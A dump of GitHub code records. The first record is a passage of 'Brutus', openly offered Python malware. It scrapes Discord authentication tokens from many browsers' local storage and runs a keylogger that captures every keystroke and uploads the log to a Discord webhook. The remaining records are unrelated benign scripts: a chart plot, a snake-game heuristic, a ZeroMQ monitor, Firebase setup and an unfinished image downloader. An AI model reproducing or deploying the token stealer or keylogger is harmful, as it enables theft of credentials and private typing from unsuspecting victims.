data=json.dumps(webhook_data))\r\n\r\n\r\n self.tokens.remove(token)\r\n\r\n def scrape_tokens(self):\r\n\r\n crawl = {\r\n 'Discord': self.pc_roaming + r'\\\\discord\\\\Local Storage\\\\leveldb\\\\',\r\n 'Discord Canary': self.pc_roaming + r'\\\\discordcanary\\\\Local Storage\\\\leveldb\\\\',\r\n 'Lightcord': self.pc_roaming + r'\\\\Lightcord\\\\Local Storage\\\\leveldb\\\\',\r\n 'Discord PTB': self.pc_roaming + r'\\\\discordptb\\\\Local Storage\\\\leveldb\\\\',\r\n 'Opera': self.pc_roaming + r'\\\\Opera Software\\\\Opera Stable\\\\Local Storage\\\\leveldb\\\\',\r\n 'Opera GX': self.pc_roaming + r'\\\\Opera Software\\\\Opera GX Stable\\\\Local Storage\\\\leveldb\\\\',\r\n 'Amigo': self.pc_local + r'\\\\Amigo\\\\User Data\\\\Local Storage\\\\leveldb\\\\',\r\n 'Torch': self.pc_local + r'\\\\Torch\\\\User Data\\\\Local Storage\\\\leveldb\\\\',\r\n 'Kometa': self.pc_local + r'\\\\Kometa\\\\User Data\\\\Local Storage\\\\leveldb\\\\',\r\n 'Orbitum': self.pc_local + r'\\\\Orbitum\\\\User Data\\\\Local Storage\\\\leveldb\\\\',\r\n 'CentBrowser': self.pc_local + r'\\\\CentBrowser\\\\User Data\\\\Local Storage\\\\leveldb\\\\',\r\n '7Star': self.pc_local + r'\\\\7Star\\\\7Star\\\\User Data\\\\Local Storage\\\\leveldb\\\\',\r\n 'Sputnik': self.pc_local + r'\\\\Sputnik\\\\Sputnik\\\\User Data\\\\Local Storage\\\\leveldb\\\\',\r\n 'Vivaldi': self.pc_local + r'\\\\Vivaldi\\\\User Data\\\\Default\\\\Local Storage\\\\leveldb\\\\',\r\n 'Chrome SxS': self.pc_local + r'\\\\Google\\\\Chrome SxS\\\\User Data\\\\Local Storage\\\\leveldb\\\\',\r\n 'Chrome': self.pc_local + r'\\\\Google\\\\Chrome\\\\User Data\\\\Default\\\\Local Storage\\\\leveldb\\\\',\r\n 'Epic Privacy Browser': self.pc_local + r'\\\\Epic Privacy Browser\\\\User Data\\\\Local Storage\\\\leveldb\\\\',\r\n 'Microsoft Edge': self.pc_local + r'\\\\Microsoft\\\\Edge\\\\User Data\\\\Defaul\\\\Local Storage\\\\leveldb\\\\',\r\n 'Uran': self.pc_local + r'\\\\uCozMedia\\\\Uran\\\\User Data\\\\Default\\\\Local Storage\\\\leveldb\\\\',\r\n 'Yandex': self.pc_local + r'\\\\Yandex\\\\YandexBrowser\\\\User Data\\\\Default\\\\Local Storage\\\\leveldb\\\\',\r\n 'Brave': self.pc_local + r'\\\\BraveSoftware\\\\Brave-Browser\\\\User Data\\\\Default\\\\Local Storage\\\\leveldb\\\\',\r\n 'Iridium': self.pc_local + r'\\\\Iridium\\\\User Data\\\\Default\\\\Local Storage\\\\leveldb\\\\'\r\n }\r\n\r\n for source, path in crawl.items():\r\n if not os.path.exists(path):\r\n continue\r\n for file_name in os.listdir(path):\r\n if not file_name.endswith('.log') and not file_name.endswith('.ldb'):\r\n continue\r\n for line in [x.strip() for x in open(f'{path}\\\\{file_name}', errors='ignore').readlines() if x.strip()]:\r\n for regex in (r'[\\w-]{24}\\.[\\w-]{6}\\.[\\w-]{27}', r'mfa\\.[\\w-]{84}'):\r\n for token in re.findall(regex, line):\r\n self.tokens.append(token)\r\n\r\n\r\ninit = Brutus()\r\n\r\n\r\nclass Keylogger:\r\n def __init__(self, interval, report_method=\"\"):\r\n\r\n self.interval = interval\r\n self.report_method = report_method\r\n self.log = \"\"\r\n\r\n \r\n def callback(self, event):\r\n\r\n name = event.name\r\n if len(name) > 1:\r\n\r\n if name == \"space\":\r\n name = \" \"\r\n elif name == \"enter\":\r\n\r\n name = \"[ENTER]\\n\"\r\n elif name == \"decimal\":\r\n name = \".\"\r\n else:\r\n name = name.replace(\" \", \"_\")\r\n name = f\"[{name.upper()}]\"\r\n if name == \"[ALT]\":\r\n name = \" [ALT] \"\r\n if name == \"[TAB]\":\r\n name = \" [TAB] \"\r\n\r\n\r\n \r\n self.log += name\r\n\r\n\r\n def update_filename(self):\r\n\r\n start_dt_str = 
str(self.start_dt)[:-7].replace(\" \", \"-\").replace(\":\", \"\")\r\n end_dt_str = str(self.end_dt)[:-7].replace(\" \", \"-\").replace(\":\", \"\")\r\n self.filename = f\"{output}\"\r\n\r\n def report_to_file(self):\r\n\r\n with open(f\"{self.filename}\", \"w\") as f:\r\n print(self.log, file=f)\r\n \r\n\r\n def report(self):\r\n f = open(output, \"r\")\r\n if self.log:\r\n self.end_dt = datetime.now()\r\n self.update_filename()\r\n if self.report_method == \"file\":\r\n self.report_to_file()\r\n\r\n self.start_dt = datetime.now()\r\n self.log = \"\"\r\n data = {\r\n \"avatar_url\": \"https://cdn.discordapp.com/avatars/854037287716651108/08948e1e8f48c0b056e525790f541168.png\", \r\n \"content\" : \"\",\r\n \"username\" : \"Brutus\"\r\n }\r\n data[\"embeds\"] = [\r\n {\r\n \"description\" : \"File uploaded.\",\r\n \"title\" : \"Brutus\",\r\n \"footer\": {\r\n \"text\": \"Fontesie#2621 • github.com/Fontesie\"\r\n }\r\n }\r\n ]\r\n \r\n result = requests.post(webhooklink, json = data)\r\n result = requests.post(webhooklink, files={'upload_file': open(output,'rb')})\r\n timer = Timer(interval=self.interval, function=self.report)\r\n timer.daemon = True\r\n timer.start()\r\n\r\n def start(self):\r\n self.start_dt = datetime.now()\r\n keyboard.on_release(callback=self.callback)\r\n self.report()\r\n keyboard.wait()\r\n\r\n\r\n\r\nif __name__ == \"__main__\":\r\n keylogger = Keylogger(interval=SEND_REPORT_EVERY, report_method=\"file\")\r\n keylogger.start()","repo_name":"Fontesie/Brutus","sub_path":"brutus_v1.pyw","file_name":"brutus_v1.pyw","file_ext":"pyw","file_size_in_byte":9263,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"13694525503","text":"# %%\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n# use to turn axis into percentage\nfrom matplotlib.ticker import PercentFormatter\nsns.set()\n\n# %%\ndf = pd.read_csv(r'/Users/lindazhong/Documents/Data_science_365/Data Visualization/bar_line_chart_data.csv')\ndf\n\n# %%\nsns.set_style('white')\n# note : it's subplots not subplot\n# ax : y-axis and x-axis\nfig, ax = plt.subplots(figsize = (10, 7), dpi=500)\nax.bar(df.Year, df.Participants, color = 'k')\nax.set_ylabel('Number of Participants', fontweight = 'bold')\nax.tick_params(axis = 'y')\n# use the same x-axis\nax1 = ax.twinx()\n\n# setting the percentage ticker\nax1.set_ylim(0,1)\nax1.yaxis.set_major_formatter(PercentFormatter(xmax = 1.0))\n###########\n\nax1.plot(df.Year, df[\"Python Users\"], color = \"#b60000\", marker = \"D\")\nax1.set_ylabel('Python User in %', fontweight = 'bold')\nax.set_title('KD Nuggets Survey Python Users (2012-2019)', fontsize = 14, fontweight = 'bold');\n","repo_name":"Liam-Lin0107/DataScience365_Course","sub_path":"Templete/Pareto_chart.py","file_name":"Pareto_chart.py","file_ext":"py","file_size_in_byte":968,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"71184157034","text":"\"\"\"\nFearful: Attempt to maximize the distance between us and other snakes(' heads)\n\"\"\"\nfrom typing import List\n\nfrom libsnek.movement import surroundings, find_path\nfrom libsnek.math import normalize_max, rms\nimport numpy as np\n\n\ndef distance_to_snake(board_state, pos, snake):\n path = find_path(board_state, pos, snake.head)\n if path is None:\n # A rough \"max\" distance\n return board_state.width + board_state.height\n\n return len(path)\n\n\ndef snake_distance_rms(board_state, pos):\n d = 
np.array([\n float(distance_to_snake(board_state, pos, s))\n for s in board_state.other_snakes\n ])\n return rms(d)\n\n\nasync def apply(board_state) -> List[float]:\n my_pos = board_state.you.body[0]\n\n distances = [\n snake_distance_rms(board_state, p)\n for p in surroundings(my_pos)\n ]\n\n return normalize_max(distances)\n\n","repo_name":"adambard/kobra-khan","sub_path":"kobrakhan/heuristics/fearful.py","file_name":"fearful.py","file_ext":"py","file_size_in_byte":871,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"74553464231","text":"\nimport argparse\nimport time\n\nfrom random import randint\nfrom typing import Any, Optional, Callable, Dict, cast\n\nimport zmq\nfrom zmq.utils.monitor import recv_monitor_message\n\n\nEVENTS_MAP = {}\n\nEVENT_NAMES = [x for x in dir(zmq) if 'EVENT_' in x]\n\nfor ev_name in EVENT_NAMES:\n EVENTS_MAP[getattr(zmq, ev_name)] = ev_name\n\n\ndef tprint(*args: Any, **kwargs: Any) -> None:\n kwargs.update({'flush': True}, **kwargs)\n when = time.strftime(\"%H:%M:%S\")\n print(when, *args, **kwargs)\n\n\ndef fetch_event(\n monitor: zmq.Socket,\n poller: zmq.Poller\n) -> Optional[Dict[str, Any]]:\n\n polled = dict(poller.poll(0))\n\n if monitor in polled:\n return cast(\n Callable[[zmq.Socket], Dict[str, Any]],\n recv_monitor_message\n )(monitor)\n\n return None\n\n\ndef main(socket_type: int) -> None:\n UID = randint(1000, 10_000)\n tprint(f\"CONNECTER [{UID}] START\")\n\n ctx = zmq.Context() # type: ignore\n binder = ctx.socket(socket_type) # type: ignore\n\n monitor = binder.get_monitor_socket()\n\n poller = zmq.Poller() # type: ignore\n poller.register(monitor)\n\n try:\n binder.connect(\"tcp://127.0.0.1:7777\")\n\n while True:\n poller.poll()\n\n event = fetch_event(monitor, poller)\n\n if event is not None:\n e_code = event['event']\n print()\n tprint('-' * 20)\n tprint(\"EVENT_CODE :\", e_code, EVENTS_MAP[e_code])\n tprint(\"EVENT_VALUE :\", event['value'])\n tprint(\"EVENT_ENDPOINT:\", event['endpoint'])\n\n except KeyboardInterrupt:\n tprint(\"\\nCtrl+C detected\")\n\n tprint(\"Closing socket ...\")\n binder.disable_monitor()\n monitor.close(1)\n binder.close(1)\n\n tprint(\"Closing context ...\")\n ctx.term() # type: ignore\n\n tprint(f\"CONNECTER [{UID}] STOP\")\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\n '-s',\n dest='socket_type',\n type=str,\n choices=zmq.utils.constant_names.socket_type_names,\n default='REP',\n )\n\n args = parser.parse_args()\n\n socket_type: int = getattr(zmq, args.socket_type)\n\n main(socket_type)\n","repo_name":"AndreiHondrari/techonologies-exploration","sub_path":"general-distributed-systems/zeromq/s30_unpredictable_state_on_wrong_conn/connecter.py","file_name":"connecter.py","file_ext":"py","file_size_in_byte":2211,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"25605780942","text":"import firebase_admin\nfrom firebase_admin import credentials\nimport sys\nsys.path.insert(1, '../')\nfrom config import *\n\nclass DbConnection:\n def __init__(self):\n if not firebase_admin._apps:\n cred = credentials.Certificate(\"serviceAccountKey.json\")\n firebase_admin.initialize_app(cred, {\n \"databaseURL\" : DATABASE_URL,\n 'storageBucket': STORAGE_URL\n })\n print(\"CODE_LOG: Database is 
connected.\")","repo_name":"huynhmytuan/yang-bot","sub_path":"db/connection.py","file_name":"connection.py","file_ext":"py","file_size_in_byte":433,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"34885008666","text":"def add(a,b):\n print(\"addition using simple function = \",a+b)\nadd(2,8)\n\nadd=lambda a,b : a+b\nprint(\"addition using lambda function = \" ,add(2,8))\n\n# Lambda functions or anonymous functions\n# def add(a, b):\n# return a+b\n#\n# # minus = lambda x, y: x-y\n#\n# def minus(x, y):\n# return x-y\n#\n# print(minus(9, 4))\n\n\na = [[1, 14], [5, 6], [8, 23]]\na.sort(key=lambda x: x[1])\nprint(a)\n\n","repo_name":"Rajatsharma2002/Basic_Python_Program","sub_path":"lambda_func.py","file_name":"lambda_func.py","file_ext":"py","file_size_in_byte":388,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"12499086908","text":"import json\n\nclass TrackPart:\n def __init__(self, start_name, end_name, line_number, line_name, km_start, km_end, coordinates):\n self.start_name = start_name\n self.end_name = end_name\n self.line_number = line_number\n self.line_name = line_name\n self.km_start = km_start\n self.km_end = km_end\n self.coordinates = coordinates\n\ndef create_shapes_file(path):\n f = open(path)\n data = json.load(f)\n track_parts = []\n for entry in data:\n entry = entry[\"fields\"]\n track_parts.append(TrackPart(start_name=entry[\"bp_anf_bez\"], end_name=entry[\"bp_end_bez\"], line_number=entry[\"linienr\"], line_name=entry[\"liniename\"], km_start=entry[\"km_agm_von\"], km_end=entry[\"km_agm_bis\"], coordinates=entry[\"geo_shape\"][\"coordinates\"]))\n \n print(len(track_parts))\n lines = []\n for e in track_parts:\n lines.append(e.line_number)\n lines = list(dict.fromkeys(lines))\n\n for line in lines:\n relevant_track_parts = [x for x in track_parts if x.line_number == line]\n for y in relevant_track_parts:\n print(y.start_name + \", \")\n print(\"\\n\\n\")\n\n\n","repo_name":"Shazral/public_transit_visualisation","sub_path":"create_shapes.py","file_name":"create_shapes.py","file_ext":"py","file_size_in_byte":1152,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"7425060863","text":"from tensorflow.keras.callbacks import Callback\nfrom tensorflow.keras.preprocessing.image import ImageDataGenerator\nimport tensorflow as tf\nfrom tensorflow.keras import backend as K\nimport glob\nfrom PIL import Image\nimport numpy as np\nimport random\nimport wandb\nfrom skimage.transform import resize\nfrom skimage import feature\n\nfrom canny_edge_detector import rgb2gray\nimport canny_edge_detector as ced\n\nfrom tensorflow.keras.applications.vgg16 import VGG16\nfrom tensorflow.keras.applications.vgg16 import preprocess_input\n\ndef perceptual_distance(y_true, y_pred):\n \"\"\"Calculate perceptual distance, DO NOT ALTER\"\"\"\n norm0 = True\n if norm0:\n y_true *= 255.0\n y_pred *= 255.0\n else:\n y_true += 1.0\n y_pred += 1.0\n y_true *= 127.5\n y_pred *= 127.5\n rmean = (y_true[:, :, :, 0] + y_pred[:, :, :, 0]) / 2\n r = y_true[:, :, :, 0] - y_pred[:, :, :, 0]\n g = y_true[:, :, :, 1] - y_pred[:, :, :, 1]\n b = y_true[:, :, :, 2] - y_pred[:, :, :, 2]\n\n return K.mean(K.sqrt((((512+rmean)*r*r)/256) + 4*g*g + (((767-rmean)*b*b)/256)))\n\ndef perceptual_distance_np(y_true, y_pred):\n \"\"\"Calculate perceptual distance, DO NOT ALTER\"\"\"\n y_true *= 255.0\n y_pred *= 255.0\n rmean = (y_true[:, :, :, 0] + 
y_pred[:, :, :, 0]) / 2\n r = y_true[:, :, :, 0] - y_pred[:, :, :, 0]\n g = y_true[:, :, :, 1] - y_pred[:, :, :, 1]\n b = y_true[:, :, :, 2] - y_pred[:, :, :, 2]\n\n return np.mean(np.sqrt((((512+rmean)*r*r)/256) + 4*g*g + (((767-rmean)*b*b)/256)))\n\nvgg = VGG16(include_top=False, weights='imagenet', input_shape=(256, 256, 3))\ndef custom_loss(y_true, y_pred):\n perceptual_loss = perceptual_distance(y_true, y_pred)\n\n y_true = preprocess_input(denormalize(y_true, True))\n y_pred = preprocess_input(denormalize(y_pred, True))\n #\n y_true = vgg(y_true)\n y_pred = vgg(y_pred)\n vgg_loss = K.mean(K.square(y_pred - y_true))\n\n return perceptual_loss + 1.0/5.0 * vgg_loss\n\n\n# _phase_shift and PS from https://github.com/tetrachrome/subpixel/blob/master/subpixel.py\ndef _phase_shift(I, r):\n # Helper function with main phase shift operation\n bsize, a, b, c = I.get_shape().as_list()\n X = tf.reshape(I, [-1, a, b, r, r])\n X = tf.transpose(X, (0, 1, 2, 4, 3)) # bsize, a, b, 1, 1\n X = tf.split(X, a, 1) # a, [bsize, b, r, r]\n X = tf.concat([tf.squeeze(x) for x in X], 2) # bsize, b, a*r, r\n X = tf.split(X, b, 1) # b, [bsize, a*r, r]\n X = tf.concat([tf.squeeze(x) for x in X], 2 ) # bsize, a*r, b*r\n return tf.reshape(X, [-1, a*r, b*r, 1])\n\ndef PS(X, r):\n # Main OP that you can arbitrarily use in you tensorflow code\n Xc = tf.split(X, 3, 3)\n X = tf.concat([_phase_shift(x, r) for x in Xc], 3)\n return X\n\ndef normalize(x, norm0):\n if norm0:\n return x / 255.0\n else:\n return x / 127.5 - 1.0\n\ndef denormalize(x, norm0):\n if norm0:\n return x * 255.0\n else:\n return (x + 1.0) * 127.5\n\ndef image_generator(batch_size, img_dir, config, shuffle=True, augment=True):\n \"\"\"A generator that returns small images and large images. DO NOT ALTER the validation set\"\"\"\n input_filenames = glob.glob(img_dir + \"/*-in.jpg\")\n counter = 0\n if shuffle:\n random.shuffle(input_filenames)\n #Data augmentation\n data_gen_args_cust = dict(#featurewise_center=True,\n #featurewise_std_normalization=True,\n #zca_whitening=True,\n rotation_range=90,\n brightness_range=(0.5, 1.0), # 0 is black, 1 is same image\n channel_shift_range=30, # value in [-channel_shift_range, channel_shift_range] added to each channel\n width_shift_range=0.2,\n height_shift_range=0.2,\n vertical_flip=True,\n horizontal_flip=True,\n shear_range=0.2,\n zoom_range=0.2)\n data_gen_args = dict(#featurewise_center=True,\n #featurewise_std_normalization=True,\n #zca_whitening=True,\n #rotation_range=90,\n brightness_range=(0.5, 1.0), # 0 is black, 1 is same image\n channel_shift_range=30, # value in [-channel_shift_range, channel_shift_range] added to each channel\n #width_shift_range=0.2,\n #height_shift_range=0.2,\n vertical_flip=True,\n horizontal_flip=True)\n #shear_range=0.2,\n #zoom_range=0.2)\n\n while True:\n small_images = np.zeros(\n (batch_size, config.input_width, config.input_height, 3))\n large_images = np.zeros(\n (batch_size, config.output_width, config.output_height, 3))\n if counter+batch_size >= len(input_filenames) or not shuffle:\n counter = 0\n for i in range(batch_size):\n img = input_filenames[counter + i]\n small_images[i] = np.array(Image.open(img))\n large_images[i] = np.array(\n Image.open(img.replace(\"-in.jpg\", \"-out.jpg\")))\n\n if img_dir == config.train_dir and augment:\n sel_custom = random.randint(1, 4) == 3 and config.custom_aug\n if sel_custom:\n image_datagen = ImageDataGenerator(**data_gen_args_cust)\n #print(data_gen_args_cust)\n else:\n image_datagen = ImageDataGenerator(**data_gen_args)\n # 
print(data_gen_args)\n seed = random.randint(1, 100000)\n gen0 = image_datagen.flow(small_images, batch_size=config.batch_size, shuffle=False, seed=seed)\n gen1 = image_datagen.flow(large_images, batch_size=config.batch_size, shuffle=False, seed=seed)\n small_images_augmented, large_images_augmented = next(zip(gen0, gen1))\n small_images_augmented = normalize(small_images_augmented, config.norm0)\n large_images_augmented = normalize(large_images_augmented, config.norm0)\n\n #small_image_resized = resize(large_images_augmented, (config.batch_size, config.input_width, config.input_height, 3), preserve_range=True, order=1, anti_aliasing=False)\n if sel_custom:\n small_images_augmented = resize(large_images_augmented, (config.batch_size, config.input_width, config.input_height, 3), preserve_range=True, order=1, anti_aliasing=False)\n\n # totalerr = 0\n # for i in range(config.batch_size):\n # err = np.sum((small_images[i].astype(\"float\") - small_image_resized[i].astype(\"float\")) ** 2)\n # err /= float(small_images[i].shape[0] * small_images[i].shape[1])\n # totalerr += err\n # print(\"===Resizing difference=\" + str(totalerr/config.batch_size))\n\n # if counter == 0:\n # augment = [np.concatenate([large_images[i], denormalize(large_images_augmented[i], config.norm0)], axis=1) for i in range(5)]\n # augment_con = np.transpose(np.concatenate(augment), axes=(0, 1, 2))\n # #np.savetxt(\"debug_aug.txt\", augment_con[:,:,0], fmt='%.2f')\n # wandb.log({\n # \"augment\": [wandb.Image(augment_con)]\n # }, commit=False)\n\n yield (small_images_augmented, large_images_augmented)\n else:\n small_images = normalize(small_images, config.norm0)\n large_images = normalize(large_images, config.norm0)\n yield (small_images, large_images)\n counter += batch_size\n\n\nclass ImageLogger(Callback):\n def __init__(self, config, reconstruction=0, attention=0):\n self.config = config\n self.reconstruction = reconstruction\n self.attention = attention\n def on_epoch_end(self, epoch, logs):\n config = self.config\n reconstruction = self.reconstruction\n attention = self.attention\n in_sample_images, out_sample_images = next(image_generator(7, config.val_dir, config, shuffle=True))\n preds = self.model.predict(in_sample_images)\n # Simple upsampling\n in_resized = [in_sample_images[i].repeat(8, axis=0).repeat(8, axis=1) for i in range(len(in_sample_images))]\n\n # To see predictions on train set\n in_sample_images_train, out_sample_images_train = next(image_generator(7, config.train_dir, config, shuffle=True, augment=False))\n preds_train = self.model.predict(in_sample_images_train)\n in_resized_train = [in_sample_images_train[i].repeat(8, axis=0).repeat(8, axis=1) for i in range(len(in_sample_images_train))]\n\n # To see learning evolution on a test image\n img_lr = np.zeros((5, config.input_width, config.input_height, 3))\n img_hr = np.zeros((5, config.output_width, config.output_height, 3))\n img_name = [\"data/test/4738140013-rose-in.jpg\", \"data/test/35869417191-hydrangea-in.jpg\", \"data/test/35825252922-orchid-in.jpg\", \"data/test/7503047224-daisy-in.jpg\", \"data/test/flowers-petals-plants-39517-in.jpg\"]\n for i in range(len(img_name)):\n img_lr[i] = normalize(np.array(Image.open(img_name[i])), config.norm0)\n img_hr[i] = normalize(np.array(Image.open(img_name[i].replace(\"-in.jpg\", \"-out.jpg\"))), config.norm0)\n preds_learn = self.model.predict(img_lr)\n in_resized_learn = [img_lr[i].repeat(8, axis=0).repeat(8, axis=1) for i in range(len(img_name))]\n\n # Intermediate logging of attention mask\n 
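# The attention head is assumed to emit a single-channel mask; np.repeat tiles it\n        # to 3 channels below purely so it can be shown as an RGB panel. Each logged row\n        # is then [nearest-neighbour x8 upsample | prediction | ground truth |\n        # reconstruction | attention mask] concatenated side by side.\n        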
preds_rec = reconstruction.predict(in_sample_images)\n preds_att = np.repeat(attention.predict(in_sample_images), 3, axis=-1)\n preds_learn_rec = reconstruction.predict(img_lr)\n preds_learn_att = np.repeat(attention.predict(img_lr), 3, axis=-1)\n\n # Output log formatting\n out_pred = [np.concatenate([denormalize(in_resized[i], config.norm0), denormalize(o, config.norm0), denormalize(out_sample_images[i], config.norm0), denormalize(preds_rec[i], not config.norm0), denormalize(preds_att[i], config.norm0)], axis=1) for i, o in enumerate(preds)]\n img_pred_con = np.transpose(np.concatenate(out_pred), axes=(0, 1, 2))\n out_train = [np.concatenate([denormalize(in_resized_train[i], config.norm0), denormalize(o, config.norm0), denormalize(out_sample_images_train[i], config.norm0)], axis=1) for i, o in enumerate(preds_train)]\n img_train_con = np.transpose(np.concatenate(out_train), axes=(0, 1, 2))\n out_learn = [np.concatenate([denormalize(in_resized_learn[i], config.norm0), denormalize(o, config.norm0), denormalize(img_hr[i], config.norm0), denormalize(preds_learn_rec[i], not config.norm0), denormalize(preds_learn_att[i], config.norm0)], axis=1) for i, o in enumerate(preds_learn)]\n img_learn_con = np.transpose(np.concatenate(out_learn), axes=(0, 1, 2))\n\n img_pred_con_pil = Image.fromarray(np.clip(img_pred_con, 0, 255).astype(\"uint8\"), mode='RGB')\n img_train_con_pil = Image.fromarray(np.clip(img_train_con, 0, 255).astype(\"uint8\"), mode='RGB')\n img_learn_con_pil = Image.fromarray(np.clip(img_learn_con, 0, 255).astype(\"uint8\"), mode='RGB')\n\n # # Test debug\n # weights_att, bias_att = attention.layers[-1].get_weights()\n # weights_rec, bias_rec = reconstruction.layers[-1].get_weights()\n # print(weights_rec[:,:,0,0])\n # print(bias_rec)\n # print(np.concatenate([weights_att[:,:,i,0] for i in range(32)]))\n # print(bias_att)\n # grads = K.gradients(loss, model.input)[0]\n # print(grads)\n # np.savetxt(\"debug_rec.txt\"%epoch, weights[:,:,0,0], fmt='%.2f')\n # np.savetxt(\"debug_att%d.txt\"%epoch, preds_att[0,:,:,0], fmt='%.2f')\n # np.savetxt(\"debug2.txt\", denormalize(preds[0,:,:,1], config.norm0), fmt='%.2f')\n # np.savetxt(\"debug3.txt\", denormalize(preds[0,:,:,1], config.norm0).astype(\"uint8\"), fmt='%.2f')\n\n # zeros = np.zeros((config.output_width, config.output_height, 3))\n # ones = np.ones((config.output_width, config.output_height, 3))\n # grey = ones / 2.0\n # zeros_ones = np.concatenate([denormalize(zeros, config.norm0), denormalize(grey, config.norm0), denormalize(ones, config.norm0)])\n # ones_ones = np.concatenate([denormalize(ones, config.norm0), denormalize(grey, config.norm0), denormalize(ones, config.norm0)])\n # wandb.log({\n # \"zeros_ones\": [wandb.Image(zeros_ones, caption=\"zeros_ones\")]\n # , \"ones_ones\": [wandb.Image(ones_ones, caption=\"ones_ones\")]\n # }, commit=False)\n\n\n #Create gif for training\n if epoch == 0:\n Image.fromarray(np.clip(img_learn_con, 0, 255).astype(\"uint8\")).save('train.gif', format='GIF', save_all=True, duration=500, loop=0)\n else:\n gif_pil = Image.open('train.gif')\n gif_frames = []\n for frame in range(0, gif_pil.n_frames):\n gif_pil.seek(frame)\n gif_frames.append([np.array(gif_pil), gif_pil.getpalette()])\n gif_frames_pil = []\n for f, palette in gif_frames:\n image = Image.fromarray(f.astype(\"uint8\"))\n image.putpalette(palette)\n gif_frames_pil.append(image)\n gif_frames_pil.append(Image.fromarray(np.clip(img_learn_con, 0, 255).astype(\"uint8\")))\n gif_frames_pil[0].save('train.gif', format='GIF', 
append_images=gif_frames_pil[1:], save_all=True, duration=500, loop=0)\n\n wandb.log({\n \"predict\": [wandb.Image(img_pred_con_pil)]\n , \"train\": [wandb.Image(img_train_con_pil)]\n , \"learn\": [wandb.Image(img_learn_con_pil)]\n }, commit=False)\n","repo_name":"geoffreywalter/superres","sub_path":"helpfunc.py","file_name":"helpfunc.py","file_ext":"py","file_size_in_byte":13741,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"36121478014","text":"def load_data_set(file_name):\n data_mat = []; label_mat = []\n fr = open(file_name)\n for line in fr.readlines():\n line_arry = line.strip().split()\n data_mat.append([float(line_arry[0]), float(line_arry[1])])\n label_mat.append(float(line_arry[2]))\n return data_mat, label_mat\n\ndef select_J_rand(i, m):\n j = i\n while (j == i):\n j = int(random.unform(0, m))\n return j\n\ndef clip_alpha(aj, H, L):\n if aj > H:\n aj = H\n if L > aj:\n aj = L\n return aj","repo_name":"Tang-Xianglong/Machine_Learning","sub_path":"svmMLiA.py","file_name":"svmMLiA.py","file_ext":"py","file_size_in_byte":513,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"15880521819","text":"#!/usr/bin/env python3\n# encoding: utf-8\n\nimport os\nimport sys\nimport subprocess\nfrom Bio import SeqIO\n\ndef identify_recombinations_with_gubbins(aln,recipient_id,recipient_mapping,tmp,prefix,recombinant,\n recombinant_name,window_min,window_max,snps_min,gubbins_p):\n\n # Avoid circular import\n from recognise.recombination import Recombination\n\n # Get ID of recombinant - note the FASTA ID does not have to match the recombinant name\n aln_index = SeqIO.index(aln,'fasta')\n recombinant_id = None\n for id in aln_index.keys():\n if id != recipient_id:\n recombinant_id = id\n # Run Gubbins\n subprocess.check_output('run_gubbins.py --prefix ' + os.path.join(tmp,prefix) + \\\n ' --pairwise ' + \\\n ' --min-window-size ' + str(window_min) + \\\n ' --max-window-size ' + str(window_max) + \\\n ' --p-value ' + str(gubbins_p) + \\\n ' --min-snps ' + str(snps_min) + \\\n ' --outgroup ' + recombinant_id + \\\n ' ' + aln + \\\n ' &> /dev/null',\n shell = True)\n # Process output\n recombination_list = []\n with open(os.path.join(tmp,prefix + '.recombination_predictions.gff'),'r') as rec_file:\n for line in rec_file.readlines():\n if not line.startswith('#'):\n info = line.rstrip().split()\n extra_vals = info[8].split('\"')\n recombination_list.append(\n Recombination(\n start = recipient_mapping[int(info[3])],\n end = recipient_mapping[int(info[4])],\n p_val = float(extra_vals[3]),\n snp_count = int(extra_vals[7]),\n recombinant = recombinant_name,\n insertions_spanned = 0,\n insertions_matched = 0,\n deletions_spanned = 0,\n deletions_matched = 0\n )\n )\n return recombination_list\n","repo_name":"nickjcroucher/recognise","sub_path":"recognise/gubbins.py","file_name":"gubbins.py","file_ext":"py","file_size_in_byte":2208,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"27027768837","text":"import asyncio\r\nimport os\r\n\r\nimport aiohttp\r\n\r\n\r\nclass ImageSave:\r\n \"\"\"图片异步存储\"\"\"\r\n\r\n def __init__(self):\r\n self.astrict = None\r\n self.__semaphore = None\r\n\r\n @staticmethod\r\n def __create_path(iamge_path): # 路径创建\r\n path = os.path.split(iamge_path)[0]\r\n if path:\r\n if os.path.exists(path):\r\n pass\r\n else:\r\n os.makedirs(path)\r\n\r\n async def __job(self, session, url_data):\r\n async 
with self.__semaphore:\r\n img = await session.get(url_data[0]) # 触发到await就切换,等待get到数据\r\n img_code = await img.read() # 读取内容\r\n image_path = url_data[1]\r\n self.__create_path(image_path)\r\n with open(str(image_path), 'wb') as f:\r\n f.write(img_code)\r\n\r\n async def __create_session(self, loop, urls):\r\n timeout = aiohttp.ClientTimeout(total=5) # 超时检测\r\n async with aiohttp.ClientSession(timeout=timeout) as session: # 建立会话session\r\n tasks = [loop.create_task(self.__job(session, url_data)) for url_data in urls] # 建立所有任务\r\n await asyncio.wait(tasks)\r\n\r\n def __create_loop(self, url_list):\r\n loop = asyncio.get_event_loop()\r\n loop.run_until_complete(self.__create_session(loop, url_list))\r\n\r\n def image_save(self, image_url, image_path, astrict=100):\r\n \"\"\"单张图片保存\"\"\"\r\n self.astrict = astrict\r\n image_iteration = [[image_url, image_path]]\r\n self.__semaphore = asyncio.Semaphore(self.astrict) # 限制并发量为500\r\n self.__data_detection(image_iteration)\r\n self.__create_loop(image_iteration)\r\n\r\n def images_save(self, image_iteration, astrict=100):\r\n 